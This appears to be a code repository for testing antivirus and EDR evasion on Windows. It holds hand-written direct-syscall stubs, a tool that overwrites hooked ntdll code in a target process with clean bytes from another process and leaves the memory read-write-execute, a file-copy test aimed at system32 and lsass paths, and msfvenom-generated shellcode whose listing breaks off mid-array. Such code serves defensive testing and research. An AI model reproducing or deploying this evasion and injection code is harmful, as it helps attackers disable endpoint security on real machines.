96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov 
r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | NtReadVirtualMemory PROC 238 | mov rax, gs:[60h] ; Load PEB into RAX. 
239 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 240 | cmp dword ptr [rax+118h], 10 241 | je NtReadVirtualMemory_Check_10_0_XXXX 242 | jmp NtReadVirtualMemory_SystemCall_Unknown 243 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 244 | cmp word ptr [rax+120h], 10240 245 | je NtReadVirtualMemory_SystemCall_10_0_10240 246 | cmp word ptr [rax+120h], 10586 247 | je NtReadVirtualMemory_SystemCall_10_0_10586 248 | cmp word ptr [rax+120h], 14393 249 | je NtReadVirtualMemory_SystemCall_10_0_14393 250 | cmp word ptr [rax+120h], 15063 251 | je NtReadVirtualMemory_SystemCall_10_0_15063 252 | cmp word ptr [rax+120h], 16299 253 | je NtReadVirtualMemory_SystemCall_10_0_16299 254 | cmp word ptr [rax+120h], 17134 255 | je NtReadVirtualMemory_SystemCall_10_0_17134 256 | cmp word ptr [rax+120h], 17763 257 | je NtReadVirtualMemory_SystemCall_10_0_17763 258 | cmp word ptr [rax+120h], 18362 259 | je NtReadVirtualMemory_SystemCall_10_0_18362 260 | cmp word ptr [rax+120h], 18363 261 | je NtReadVirtualMemory_SystemCall_10_0_18363 262 | cmp word ptr [rax+120h], 19041 263 | je NtReadVirtualMemory_SystemCall_10_0_19041 264 | cmp word ptr [rax+120h], 19042 265 | je NtReadVirtualMemory_SystemCall_10_0_19042 266 | jmp NtReadVirtualMemory_SystemCall_Unknown 267 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 268 | mov eax, 003fh 269 | jmp NtReadVirtualMemory_Epilogue 270 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 271 | mov eax, 003fh 272 | jmp NtReadVirtualMemory_Epilogue 273 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 274 | mov eax, 003fh 275 | jmp NtReadVirtualMemory_Epilogue 276 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 277 | mov eax, 003fh 278 | jmp NtReadVirtualMemory_Epilogue 279 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 280 | mov eax, 003fh 281 | jmp NtReadVirtualMemory_Epilogue 282 | 
NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 283 | mov eax, 003fh 284 | jmp NtReadVirtualMemory_Epilogue 285 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 286 | mov eax, 003fh 287 | jmp NtReadVirtualMemory_Epilogue 288 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903) 289 | mov eax, 003fh 290 | jmp NtReadVirtualMemory_Epilogue 291 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 292 | mov eax, 003fh 293 | jmp NtReadVirtualMemory_Epilogue 294 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 295 | mov eax, 003fh 296 | jmp NtReadVirtualMemory_Epilogue 297 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 298 | mov eax, 003fh 299 | jmp NtReadVirtualMemory_Epilogue 300 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 301 | ret 302 | NtReadVirtualMemory_Epilogue: 303 | mov r10, rcx 304 | syscall 305 | ret 306 | NtReadVirtualMemory ENDP 307 | 308 | end 309 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/main.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | #include "InterProcessSectionCopying.h" 9 | #include 10 | #include 11 | #include "sysc_sw2.h" 12 | #include 13 | 14 | #pragma comment (lib, "Dbghelp.lib") 15 | 16 | #define bytesToCompare 16 17 | 18 | int unhook(DWORD sourcePid, DWORD targetPid, LPCSTR dllName) 19 | { 20 | printf("Reading source and target...\n"); 21 | 22 | //Open process using syscalls 23 | HANDLE processHandleTarget = NULL; 24 | OBJECT_ATTRIBUTES ObjectAttributesTarget; 25 | InitializeObjectAttributes(&ObjectAttributesTarget, NULL, 0, NULL, NULL); 26 | CLIENT_ID uPidTarget = { 0 }; 27 | uPidTarget.UniqueProcess = (HANDLE)targetPid; 28 | uPidTarget.UniqueThread = 
(HANDLE)0; 29 | NTSTATUS statusOpenTarget = ZwOpenProcess10(&processHandleTarget, SYNCHRONIZE | STANDARD_RIGHTS_REQUIRED | 0xFFFF, &ObjectAttributesTarget, &uPidTarget); 30 | if (!statusOpenTarget == STATUS_SUCCESS) 31 | { 32 | printf("ERROR: Open target proc!"); 33 | return -1; 34 | } 35 | 36 | //Open the source process using syscalls (both status checks here are written as !status == STATUS_SUCCESS, which parses as (!status) == 0; because STATUS_SUCCESS is 0 this still rejects any non-zero status, but status != STATUS_SUCCESS is the intended form) 37 | HANDLE processHandleSource = NULL; 38 | OBJECT_ATTRIBUTES ObjectAttributesSource; 39 | InitializeObjectAttributes(&ObjectAttributesSource, NULL, 0, NULL, NULL); 40 | CLIENT_ID uPidSource = { 0 }; 41 | uPidSource.UniqueProcess = (HANDLE) sourcePid; 42 | uPidSource.UniqueThread = (HANDLE)0; 43 | NTSTATUS statusOpenSource = ZwOpenProcess10(&processHandleSource, SYNCHRONIZE | STANDARD_RIGHTS_REQUIRED | 0xFFFF, &ObjectAttributesSource, &uPidSource); 44 | if (!statusOpenSource == STATUS_SUCCESS) 45 | { 46 | printf("ERROR: Open source proc!"); 47 | return -2; 48 | } 49 | 50 | HMODULE dllToFix = GetModuleHandleA(dllName); 51 | MODULEINFO moduleInfo = {}; 52 | 53 | //Get DLL information based on the version loaded in the current process 54 | if (GetModuleInformation(GetCurrentProcess(), dllToFix, &moduleInfo, sizeof(moduleInfo)) == 0) { 55 | printf("GetModuleInformation error: %d\n", GetLastError()); 56 | printf("[%d]\n", __LINE__); 57 | return -3; 58 | } 59 | 60 | // Get base address of hooked Ntdll from MODULEINFO struct (this base comes from the current process but is used below to read from the source and write to the target process, so the DLL is assumed to be mapped at the same base address in all three) 61 | LPVOID hookedNtdllBaseAddress = NULL; 62 | hookedNtdllBaseAddress = (LPVOID)moduleInfo.lpBaseOfDll; 63 | if (hookedNtdllBaseAddress == 0) 64 | { 65 | printf("ERROR: Could not find base address! 
DLL exists?"); 66 | return -4; 67 | } 68 | 69 | printf("%-20s 0x%p\n", "Tainted dll base address: ", hookedNtdllBaseAddress); 70 | 71 | PIMAGE_DOS_HEADER dosHeader = 0; 72 | PIMAGE_NT_HEADERS ntHeader = 0; 73 | PIMAGE_SECTION_HEADER sectionHeader = 0; 74 | LPSTR sectionName; 75 | SIZE_T textSectionSize = NULL; 76 | LPVOID hookedNtdllTextStartAddress = NULL; 77 | 78 | // Get DOS header 79 | dosHeader = (PIMAGE_DOS_HEADER)hookedNtdllBaseAddress; 80 | 81 | // Get Nt Header 82 | ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)hookedNtdllBaseAddress + dosHeader->e_lfanew); 83 | 84 | Sleep(50); 85 | // Loop through all the PE sections until we find .text section (some adapted code based on Shellycoat) 86 | for (SIZE_T i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { 87 | // Get PE section header 88 | sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(ntHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); 89 | 90 | // Get section name 91 | sectionName = (LPSTR)sectionHeader->Name; 92 | 93 | // We found .text section! 
94 | if (!strcmp(sectionName, ".text")) { 95 | Sleep(50); 96 | printf("Found .text section\n"); 97 | 98 | textSectionSize = sectionHeader->Misc.VirtualSize; 99 | printf(".text section size: %d\n", textSectionSize); 100 | hookedNtdllTextStartAddress = (LPVOID)((DWORD_PTR)hookedNtdllBaseAddress + (DWORD_PTR)sectionHeader->VirtualAddress); 101 | break; 102 | } 103 | } 104 | if (textSectionSize == NULL) 105 | { 106 | printf("Error: .text section not found!"); 107 | return -5; 108 | } 109 | 110 | SIZE_T lpNumberOfBytesRead = 0; 111 | SIZE_T lpNumberOfBytesWritten = 0; 112 | PVOID buffer = (PVOID)malloc((ULONG)(textSectionSize + 4096)); //4096 is the page size: one extra page of slack is allocated beyond the section size (the malloc result is not NULL-checked) 113 | 114 | printf("Reading fresh content from source...\n"); 115 | NTSTATUS statusRead = NtReadVirtualMemory(processHandleSource, hookedNtdllTextStartAddress, buffer, textSectionSize, &lpNumberOfBytesRead); 116 | if (statusRead != STATUS_SUCCESS) { 117 | printf("NtReadVirtualMemory error: %X\n", statusRead); 118 | return -6; 119 | } 120 | //Remove page protection (the previous protection is stored in oldProtection; note that the address and size are passed by pointer and may be adjusted by the call, and the write below uses whatever values come back) 121 | printf("Removing page protection...\n"); 122 | ULONG oldProtection; 123 | NTSTATUS statusProtect = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress, &textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 124 | if (statusProtect != STATUS_SUCCESS) { 125 | printf("ZwProtectVirtualMemory10 error: %X\n", statusProtect); 126 | return -7; 127 | } 128 | 129 | //Write the freshly read .text bytes into the target process 130 | printf("Writing fresh content to target...\n"); 131 | NTSTATUS statusWrite = ZwWriteVirtualMemory10(processHandleTarget, hookedNtdllTextStartAddress, buffer, textSectionSize, &lpNumberOfBytesWritten); 132 | if (statusWrite != STATUS_SUCCESS) { 133 | printf("ZwWriteVirtualMemory10 error: %X\n", statusWrite); 134 | return -8; 135 | } 136 | 137 | //Restore page protections (note: the call below passes PAGE_EXECUTE_READWRITE again rather than oldProtection, so the original protection is not actually reinstated and the region is left RWX) 138 | printf("Restoring page protection...\n"); 139 | NTSTATUS statusRestore = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress, 
&textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 140 | if (statusRestore != STATUS_SUCCESS) { 141 | printf("ZwProtectVirtualMemory10 error: %X\n", statusRestore); 142 | return -9; 143 | } 144 | CloseHandle(processHandleSource); 145 | CloseHandle(processHandleTarget); 146 | printf("Done!\n"); 147 | return 0; 148 | } 149 | 150 | int wmain(int argc, wchar_t* argv[]) { 151 | 152 | if (argc != 4) 153 | { 154 | printf("Supply source pid, target pid and dllname as arguments. \n"); 155 | return -1; 156 | } 157 | 158 | DWORD sourcePid = _wtoi(argv[1]); 159 | DWORD targetPid = _wtoi(argv[2]); 160 | 161 | std::wstring wDll(argv[3]); //convert to wstring 162 | std::string sDll(wDll.begin(), wDll.end()); //and convert to string. 163 | LPCSTR dllName = (LPCSTR)sDll.c_str(); 164 | 165 | printf("\nUnhooking by Interprocess Section Copying (TM) \n\n"); 166 | 167 | printf(" ,w \n"); 168 | printf(" ,@* \n"); 169 | printf(" ,w, ,@\" \n"); 170 | printf(" \"~w gP \n"); 171 | printf(" ,@` ww, \n"); 172 | printf(" gP '~=\" \n"); 173 | printf(" /@@@@r \n"); 174 | printf(" $NM\",w~w, \n"); 175 | printf(" - @\" j- $ \n"); 176 | printf(" @K gP \"*~r\"`, ggN@MM & &&&MM & Nwg, \n"); 177 | printf(" a]@\" ,@` w*\"*w ,g@$|||@lllllllllllll||T$m, ,g@C \n"); 178 | printf(" ]P gP` N,,,A,@M||@llll@llllllllllllllllll|T&g, ,g@M$@C \n"); 179 | printf(" @ ,g@\" ,@$|ll$ Mll$|llll|lg@@@g||lllllllll||MNmgggMT|lly@ \n"); 180 | printf(" \"***\"` ]@ | lll | ll$ | llllll | TMNN@@@@@@lllllllllllllllllll@` \n"); 181 | printf(" \"Bglll]Wlllllllllllllllllllllllllll|@@m@@glll%W \n"); 182 | printf(" '*N@$lllllllllllllllllll||g@@NM*` *N@|%w \n"); 183 | printf(" \"*RN@@@@@@@@@NRP*\"\"\"` *@@w \n"); 184 | printf(" \"\" \n"); 185 | 186 | printf("Source pid: %d\n\n", sourcePid); 187 | printf("Target pid: %d\n\n", targetPid); 188 | 189 | return unhook(sourcePid, targetPid, dllName); 190 | } -------------------------------------------------------------------------------- 
/CustomCode/InterprocessSectionCopying/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | NtReadVirtualMemory PROC 4 | mov rax, gs:[60h] ; Load PEB into RAX. 5 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 6 | cmp dword ptr [rax+118h], 10 7 | je NtReadVirtualMemory_Check_10_0_XXXX 8 | jmp NtReadVirtualMemory_SystemCall_Unknown 9 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 10 | cmp word ptr [rax+120h], 10240 11 | je NtReadVirtualMemory_SystemCall_10_0_10240 12 | cmp word ptr [rax+120h], 10586 13 | je NtReadVirtualMemory_SystemCall_10_0_10586 14 | cmp word ptr [rax+120h], 14393 15 | je NtReadVirtualMemory_SystemCall_10_0_14393 16 | cmp word ptr [rax+120h], 15063 17 | je NtReadVirtualMemory_SystemCall_10_0_15063 18 | cmp word ptr [rax+120h], 16299 19 | je NtReadVirtualMemory_SystemCall_10_0_16299 20 | cmp word ptr [rax+120h], 17134 21 | je NtReadVirtualMemory_SystemCall_10_0_17134 22 | cmp word ptr [rax+120h], 17763 23 | je NtReadVirtualMemory_SystemCall_10_0_17763 24 | cmp word ptr [rax+120h], 18362 25 | je NtReadVirtualMemory_SystemCall_10_0_18362 26 | cmp word ptr [rax+120h], 18363 27 | je NtReadVirtualMemory_SystemCall_10_0_18363 28 | cmp word ptr [rax+120h], 19041 29 | je NtReadVirtualMemory_SystemCall_10_0_19041 30 | cmp word ptr [rax+120h], 19042 31 | je NtReadVirtualMemory_SystemCall_10_0_19042 32 | jmp NtReadVirtualMemory_SystemCall_Unknown 33 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 34 | mov eax, 003fh 35 | jmp NtReadVirtualMemory_Epilogue 36 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 37 | mov eax, 003fh 38 | jmp NtReadVirtualMemory_Epilogue 39 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 40 | mov eax, 003fh 41 | jmp NtReadVirtualMemory_Epilogue 42 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 43 | mov eax, 003fh 44 | jmp 
NtReadVirtualMemory_Epilogue 45 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 46 | mov eax, 003fh 47 | jmp NtReadVirtualMemory_Epilogue 48 | NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 49 | mov eax, 003fh 50 | jmp NtReadVirtualMemory_Epilogue 51 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 52 | mov eax, 003fh 53 | jmp NtReadVirtualMemory_Epilogue 54 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903) 55 | mov eax, 003fh 56 | jmp NtReadVirtualMemory_Epilogue 57 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 58 | mov eax, 003fh 59 | jmp NtReadVirtualMemory_Epilogue 60 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 61 | mov eax, 003fh 62 | jmp NtReadVirtualMemory_Epilogue 63 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 64 | mov eax, 003fh 65 | jmp NtReadVirtualMemory_Epilogue 66 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 
67 | ret 68 | NtReadVirtualMemory_Epilogue: 69 | mov r10, rcx 70 | syscall 71 | ret 72 | NtReadVirtualMemory ENDP 73 | 74 | end -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/sysc_sw2.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | EXTERN_C NTSTATUS NtReadVirtualMemory( 6 | IN HANDLE ProcessHandle, 7 | IN PVOID BaseAddress OPTIONAL, 8 | OUT PVOID Buffer, 9 | IN SIZE_T BufferSize, 10 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 11 | 12 | -------------------------------------------------------------------------------- /CustomCode/PaLoCF/PaLoCF.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | void step(int line) 12 | { 13 | printf("[%d]", line); 14 | Sleep(1000); 15 | } 16 | 17 | bool directoryExists(const std::string& directoryName) 18 | { 19 | DWORD ftyp = GetFileAttributesA(directoryName.c_str()); 20 | if (ftyp == INVALID_FILE_ATTRIBUTES) 21 | return false; 22 | 23 | if (ftyp & FILE_ATTRIBUTE_DIRECTORY) 24 | return true; 25 | 26 | return false; 27 | } 28 | 29 | void copyFile(LPCWSTR fileSource, LPCWSTR fileDest, int& ret,BOOL expectError,DWORD expectedErrorCode) 30 | { 31 | int res = CopyFileEx(fileSource, fileDest, NULL, NULL, NULL, COPY_FILE_NO_BUFFERING); 32 | if (res == 0) 33 | { 34 | if (expectError == FALSE) 35 | { 36 | std::wcout << "\nNo Error expected!\n"; 37 | ret = -1; 38 | } 39 | else 40 | if (GetLastError() != expectedErrorCode) 41 | { 42 | std::wcout << "\nCopying " << fileSource << " to " << fileDest << " failed with unexpected error " << GetLastError() << "\n"; 43 | ret = -1; 44 | } 45 | } 46 | else 47 | { 48 | if (expectError == TRUE) 49 | { 50 | std::wcout << "\nError expected, none occured!\n"; 51 | ret = -1; 52 | } 53 | 
} 54 | } 55 | 56 | int main(int argc, char* argv[]) 57 | { 58 | int ret = 0; 59 | printf("Compile time (for unique compilation): %s\n", __TIME__); 60 | printf("Waiting for some time to allow UH technique and detection of hooks...\n"); 61 | Sleep(9000); 62 | Sleep(9000); 63 | Sleep(9000); 64 | Sleep(9000); 65 | Sleep(9000); 66 | Sleep(9000); 67 | Sleep(9000); 68 | Sleep(9000); 69 | Sleep(9000); 70 | Sleep(9000); 71 | 72 | printf("Copying files.... "); 73 | step(__LINE__); 74 | 75 | if (!directoryExists("c:\\tempdir")) 76 | { 77 | if (_mkdir("c:\\tempdir") != 0) 78 | { 79 | printf("make dir failed"); 80 | ret = -1; 81 | } 82 | } 83 | step(__LINE__); 84 | copyFile(L"PaLoCF.exe", L"c:\\tempdir\\evil.exe", ret, FALSE, 0); 85 | step(__LINE__); 86 | copyFile(L"z:\\AV\\evil.txt", L"c:\\tempdir\\evil.exe",ret, FALSE, 0); 87 | step(__LINE__); 88 | copyFile(L"z:\\AV\\evil.txt", L"c:\\tempdir\\evil.exe", ret, FALSE, 0); //Twice, file exists 89 | step(__LINE__); 90 | copyFile(L"z:\\AV\\evil.txt", L"c:\\windows\\system32\\ntdll.dll", ret, TRUE, 5); 91 | step(__LINE__); 92 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\tempdir\\evil2.exe", ret, FALSE, 0); 93 | step(__LINE__); 94 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\ntdll2.dll", ret, TRUE, 5); 95 | step(__LINE__); 96 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\ntdll.dll", ret, TRUE, 5); 97 | step(__LINE__); 98 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\ntdll2.dll", ret, TRUE, 5); 99 | step(__LINE__); 100 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 101 | step(__LINE__); 102 | copyFile(L"z:\\AV\\evil.txt", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 103 | step(__LINE__); 104 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\tempdir\\test1.dll", ret, FALSE, 0); 105 | step(__LINE__); 106 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\tempdir\\test2.exe", ret, FALSE, 0); 107 | 
step(__LINE__); 108 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\tempdir\\test3.com", ret, FALSE, 0); 109 | step(__LINE__); 110 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\windows\\system32\\lsasss.exe", ret, TRUE, 5); 111 | step(__LINE__); 112 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\tempdir\\test.dll", ret, FALSE, 0); 113 | step(__LINE__); 114 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\tempdir\\lsass2.exe", ret, FALSE, 0); 115 | step(__LINE__); 116 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\windows\\system32\\lsass2.exe", ret, TRUE, 5); 117 | step(__LINE__); 118 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 119 | step(__LINE__); 120 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 121 | if (ret != 0) 122 | { 123 | printf("ERROR: return code not 0"); 124 | return -1; 125 | } 126 | Sleep(9000); 127 | step(__LINE__); 128 | printf("Done.\n"); 129 | return 0; 130 | } 131 | 132 | -------------------------------------------------------------------------------- /CustomCode/PaLoCF/PaLoCF.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {594ad1a0-2692-4c42-bc7b-b1799e500cc6} 25 | PaLoCF 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | 
WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | MultiThreaded 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /CustomCode/PaLoCF/PaLoCF.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /CustomCode/PaLoInj/PaLoInj.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) 10 | { 11 | printf("Compile time (for unique compilation): %s\n", __TIME__); 12 | printf("Waiting for some time to allow UH technique and detection of hooks...\n"); 13 | Sleep(9000); 14 | Sleep(9000); 15 | Sleep(9000); 16 | Sleep(9000); 17 | Sleep(9000); 18 | Sleep(9000); 19 | Sleep(9000); 20 | Sleep(9000); 21 | Sleep(9000); 22 | Sleep(9000); 23 
| 24 | unsigned char buf5[] = 25 | 26 | //Messagebox OS3 generated using msfvenom: 27 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" 28 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" 29 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" 30 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" 31 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" 32 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88" 33 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48" 34 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e" 35 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41" 36 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24" 37 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0" 38 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e" 39 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" 40 | 